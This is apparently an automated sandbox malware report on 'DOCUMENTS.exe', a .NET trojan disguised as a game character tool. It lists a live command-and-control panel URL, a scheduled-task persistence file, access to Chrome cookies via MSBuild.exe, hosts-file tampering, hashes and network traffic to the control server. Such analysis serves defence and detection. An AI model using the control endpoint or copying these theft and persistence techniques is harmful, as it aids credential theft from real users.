                                    http://www.carterandcone.comlDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cn/DOCUMENTS.exe, 00000000.00000003.255313836.0000000005AE4000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cnDOCUMENTS.exe, 00000000.00000003.254970840.0000000005AE4000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlDOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cn6DOCUMENTS.exe, 00000000.00000003.254947083.0000000005B1D000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.jiyu-kobo.co.jp/DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sajatypeworks.coma-dDOCUMENTS.exe, 00000000.00000003.252219497.0000000005AFB000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers8DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/YuDOCUMENTS.exe, 00000000.00000003.257338663.0000000005AE4000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://161.129.64.49/webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php127.0.0.1POSTMSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.founder.com.cn/cnle:gKgDOCUMENTS.exe, 00000000.00000003.254970840.0000000005AE4000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sajatypeworks.comibi_DOCUMENTS.exe, 00000000.00000003.252219497.0000000005AFB000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          161.129.64.49
                                          unknownUnited States
                                          8100ASN-QUADRANET-GLOBALUStrue

                                          General Information

                                          Joe Sandbox Version:33.0.0 White Diamond
                                          Analysis ID:483808
                                          Start date:15.09.2021
                                          Start time:14:11:35
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 59s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:DOCUMENTS.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:25
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.adwa.spyw.evad.winEXE@6/6@0/1
                                          EGA Information:Failed
                                          HDC Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • HTTP Packets have been reduced
                                          • TCP Packets have been reduced to 100
                                          • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 20.82.210.154, 209.197.3.8, 40.112.88.60, 23.216.77.209, 23.216.77.208, 20.50.102.62
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/483808/sample/DOCUMENTS.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          14:12:45API Interceptor1x Sleep call for process: DOCUMENTS.exe modified
                                          14:13:01API Interceptor220x Sleep call for process: MSBuild.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          161.129.64.49Purchase_Inquiry_pdf.exeGet hashmaliciousBrowse
                                          • bot.statusupdate.one/webpanel-charles/mawa/e22cc3544e8953ec6191.php

                                          Domains

                                          No context

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          ASN-QUADRANET-GLOBALUSALP.exeGet hashmaliciousBrowse
                                          • 185.174.101.21
                                          Purchase_Inquiry_pdf.exeGet hashmaliciousBrowse
                                          • 161.129.64.49
                                          2dv5TkS2quGet hashmaliciousBrowse
                                          • 23.163.68.154
                                          OyGRw8uet6Get hashmaliciousBrowse
                                          • 162.222.212.221
                                          OVLzirpJInGet hashmaliciousBrowse
                                          • 67.215.243.106
                                          KXM253rCpWGet hashmaliciousBrowse
                                          • 45.199.228.230
                                          Antisocial.x86Get hashmaliciousBrowse
                                          • 45.199.228.217
                                          APfSnkgVzUGet hashmaliciousBrowse
                                          • 45.199.228.226
                                          govu4Jnm6BGet hashmaliciousBrowse
                                          • 146.71.41.200
                                          INVOICE.exeGet hashmaliciousBrowse
                                          • 69.174.100.168
                                          GOM.exeGet hashmaliciousBrowse
                                          • 66.154.103.106
                                          BqfM9JwIC5Get hashmaliciousBrowse
                                          • 146.71.41.222
                                          RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exeGet hashmaliciousBrowse
                                          • 204.44.86.179
                                          RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exeGet hashmaliciousBrowse
                                          • 204.44.86.179
                                          BahcfFNy25bmV1c.exeGet hashmaliciousBrowse
                                          • 154.81.38.79
                                          Invoice-packing list BL NO. 212142500 MRKU7550471 ML-IN4104393.tarGet hashmaliciousBrowse
                                          • 204.44.86.179
                                          PO23456.docGet hashmaliciousBrowse
                                          • 104.223.93.90
                                          Swift Copy.docGet hashmaliciousBrowse
                                          • 104.223.93.90
                                          mipsGet hashmaliciousBrowse
                                          • 104.223.82.208
                                          DHL-Express-Document.docGet hashmaliciousBrowse
                                          • 104.223.93.90

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\DOCUMENTS.exe.log
                                          Process:C:\Users\user\Desktop\DOCUMENTS.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):525
                                          Entropy (8bit):5.2874233355119316
                                          Encrypted:false
                                          SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                          MD5:61CCF53571C9ABA6511D696CB0D32E45
                                          SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                          SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                          SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                          C:\Users\user\AppData\Local\Temp\tmp9BE9.tmp
                                          Process:C:\Users\user\Desktop\DOCUMENTS.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1648
                                          Entropy (8bit):5.1738828453688175
                                          Encrypted:false
                                          SSDEEP:24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBltn:cbhC7ZlNQF/rydbz9I3YODOLNdq3Z
                                          MD5:5D3CDCFF6EABE012BBEBC4281117633B
                                          SHA1:B3FD11D90DB33896C0B7AFFBC6B8DE3B4E226B20
                                          SHA-256:2B3C1A3F3C743542D0D7364632C7AB24CC9C41A637CE92EF1E0AB98649223AAA
                                          SHA-512:E2E47BF551085B1D240B6DCF284139BB944C25C863B23FF465E5F7CF73900C70C85174EB516735F429749286B8869E6711DCFD07C231F4BF569B357DCDD04333
                                          Malicious:true
                                          Reputation:low
                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t
                                          C:\Users\user\AppData\Roaming\gqunln5w.0fq\Chrome\Default\Cookies
                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                          Category:modified
                                          Size (bytes):20480
                                          Entropy (8bit):0.698304057893793
                                          Encrypted:false
                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                          MD5:3806E8153A55C1A2DA0B09461A9C882A
                                          SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                          SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                          SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                          Malicious:false
                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Roaming\ncXzBAPDBtn.exe
                                          Process:C:\Users\user\Desktop\DOCUMENTS.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):713728
                                          Entropy (8bit):7.47266846561291
                                          Encrypted:false
                                          SSDEEP:12288:IuhWHCM2K4CoI/yzQs2TWIlI40xXO5HYC3Z6ZmrlTKzvNWhrPSfav1VMxelDI:IuD3C1oIlI5Y5Hl3Z60ezvNWhrPSfavg
                                          MD5:F93324854461139C58E0E865CEB3C859
                                          SHA1:3DEEDA7CEA856D0D45EE83AEB23E000101623C32
                                          SHA-256:AAAC6D698326E6FBBCD64057FBF591EF97BF143494EDE008D41AB75E5A37DB5A
                                          SHA-512:0330D46FB8F872D5B52E94DDF859F0458B6E97E4A40E37C67EBF39B9846B3A0D199329DC591579F7E2C26A89DF3F998A34B5BD0DE0DCED0A45F5454333EC0E90
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 18%
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Aa..............0..t...n........... ........@.. .......................@............@.................................H...O........k................... ....................................................... ............... ..H............text....r... ...t.................. ..`.rsrc....k.......l...v..............@..@.reloc....... ......................@..B................|.......H...................Q....*...g...........................................0............}.....(.......(......r...p.(....(....o......{.....(....o......{....r...p.(....(....o......{.....(....o......{.....(....o......{.....(....o.....*...0.._........(.........(.....o............,)....t......o....r-..p(......,..o......+..(....o....(......+...*..0...........(....o....o....o ....+..*...0..:........(.........(.....o............,.r-..p.+....t....o!....+..*...0..:........(.........(....
                                          C:\Users\user\AppData\Roaming\ncXzBAPDBtn.exe:Zone.Identifier
                                          Process:C:\Users\user\Desktop\DOCUMENTS.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:false
                                          Preview: [ZoneTransfer]....ZoneId=0
                                          C:\Windows\System32\drivers\etc\hosts
                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):11
                                          Entropy (8bit):2.663532754804255
                                          Encrypted:false
                                          SSDEEP:3:iLE:iLE
                                          MD5:B24D295C1F84ECBFB566103374FB91C5
                                          SHA1:6A750D3F8B45C240637332071D34B403FA1FF55A
                                          SHA-256:4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
                                          SHA-512:9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
                                          Malicious:true
                                          Preview: ..127.0.0.1

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.47266846561291
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:DOCUMENTS.exe
                                          File size:713728
                                          MD5:f93324854461139c58e0e865ceb3c859
                                          SHA1:3deeda7cea856d0d45ee83aeb23e000101623c32
                                          SHA256:aaac6d698326e6fbbcd64057fbf591ef97bf143494ede008d41ab75e5a37db5a
                                          SHA512:0330d46fb8f872d5b52e94ddf859f0458b6e97e4a40e37c67ebf39b9846b3a0d199329dc591579f7e2c26a89df3f998a34b5bd0de0dced0a45f5454333ec0e90
                                          SSDEEP:12288:IuhWHCM2K4CoI/yzQs2TWIlI40xXO5HYC3Z6ZmrlTKzvNWhrPSfav1VMxelDI:IuD3C1oIlI5Y5Hl3Z60ezvNWhrPSfavg
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Aa..............0..t...n........... ........@.. .......................@............@................................

                                          File Icon

                                          Icon Hash:f1f0f4d0eecccc71

                                          Static PE Info

                                          General

                                          Entrypoint:0x4a929a
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x61418F0C [Wed Sep 15 06:13:32 2021 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v2.0.50727
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa92480x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x6ba8.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xa72a00xa7400False0.825874089126data7.54267894462IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rsrc0xaa0000x6ba80x6c00False0.443070023148data5.09676970176IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xb20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0xaa2000x668data
                                          RT_ICON0xaa8780x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1953594267, next used block 28725
                                          RT_ICON0xaab700x128GLS_BINARY_LSB_FIRST
                                          RT_ICON0xaaca80xea8data
                                          RT_ICON0xabb600x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                          RT_ICON0xac4180x568GLS_BINARY_LSB_FIRST
                                          RT_ICON0xac9900x25a8data
                                          RT_ICON0xaef480x10a8data
                                          RT_ICON0xb00000x468GLS_BINARY_LSB_FIRST
                                          RT_GROUP_ICON0xb04780x84data
                                          RT_VERSION0xb050c0x49cdata
                                          RT_MANIFEST0xb09b80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Version Infos

                                          DescriptionData
                                          Translation0x0000 0x04b0
                                          LegalCopyrightCopyright 2008 - 2010
                                          Assembly Version1.3.0.0
                                          InternalNameUnmanagedMemoryStre.exe
                                          FileVersion1.3.0.0
                                          CompanyNameWHC
                                          LegalTrademarks
                                          CommentsA little Tool where you can check the stats of your RYL - Risk Your Life - characters. Ruins of War version.
                                          ProductNameRYL Character Tool - RoW EU version
                                          ProductVersion1.3.0.0
                                          FileDescriptionRYL Character Tool - RoW EU version
                                          OriginalFilenameUnmanagedMemoryStre.exe

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 15, 2021 14:12:29.273679972 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.273726940 CEST44349695204.79.197.200192.168.2.5
                                          Sep 15, 2021 14:12:29.273844004 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.274627924 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.274641037 CEST44349695204.79.197.200192.168.2.5
                                          Sep 15, 2021 14:12:29.332669973 CEST44349695204.79.197.200192.168.2.5
                                          Sep 15, 2021 14:12:29.332811117 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.333642006 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.333651066 CEST44349695204.79.197.200192.168.2.5
                                          Sep 15, 2021 14:12:29.334794998 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.334805965 CEST44349695204.79.197.200192.168.2.5
                                          Sep 15, 2021 14:12:29.334928036 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.334939957 CEST44349695204.79.197.200192.168.2.5
                                          Sep 15, 2021 14:12:29.335026979 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.335037947 CEST44349695204.79.197.200192.168.2.5
                                          Sep 15, 2021 14:12:29.335047960 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.335056067 CEST44349695204.79.197.200192.168.2.5
                                          Sep 15, 2021 14:12:29.335127115 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.335139036 CEST44349695204.79.197.200192.168.2.5
                                          Sep 15, 2021 14:12:29.335154057 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.335161924 CEST44349695204.79.197.200192.168.2.5
                                          Sep 15, 2021 14:12:29.335230112 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.335238934 CEST44349695204.79.197.200192.168.2.5
                                          Sep 15, 2021 14:12:29.504945993 CEST44349695204.79.197.200192.168.2.5
                                          Sep 15, 2021 14:12:29.505095959 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.505115986 CEST44349695204.79.197.200192.168.2.5
                                          Sep 15, 2021 14:12:29.505166054 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.508220911 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:12:29.508232117 CEST49695443192.168.2.5204.79.197.200
                                          Sep 15, 2021 14:13:10.438263893 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:10.462893963 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:10.463027954 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:10.463701010 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:10.489706039 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:10.491146088 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:10.576014042 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:12.638597012 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:12.682830095 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:12.908216000 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:12.935074091 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:12.935535908 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:13.013170958 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:13.231173038 CEST4974080192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:13.255914927 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:13.256000996 CEST4974080192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:13.256377935 CEST4974080192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:13.281702995 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:13.282222033 CEST4974080192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:13.357038021 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:14.298929930 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:14.299721956 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:14.324831009 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:14.328134060 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:14.403898001 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:14.418926001 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:14.419704914 CEST4974080192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:14.446351051 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:14.446696997 CEST4974080192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:14.528503895 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:15.673455954 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:15.674104929 CEST4973980192.168.2.5161.129.64.49
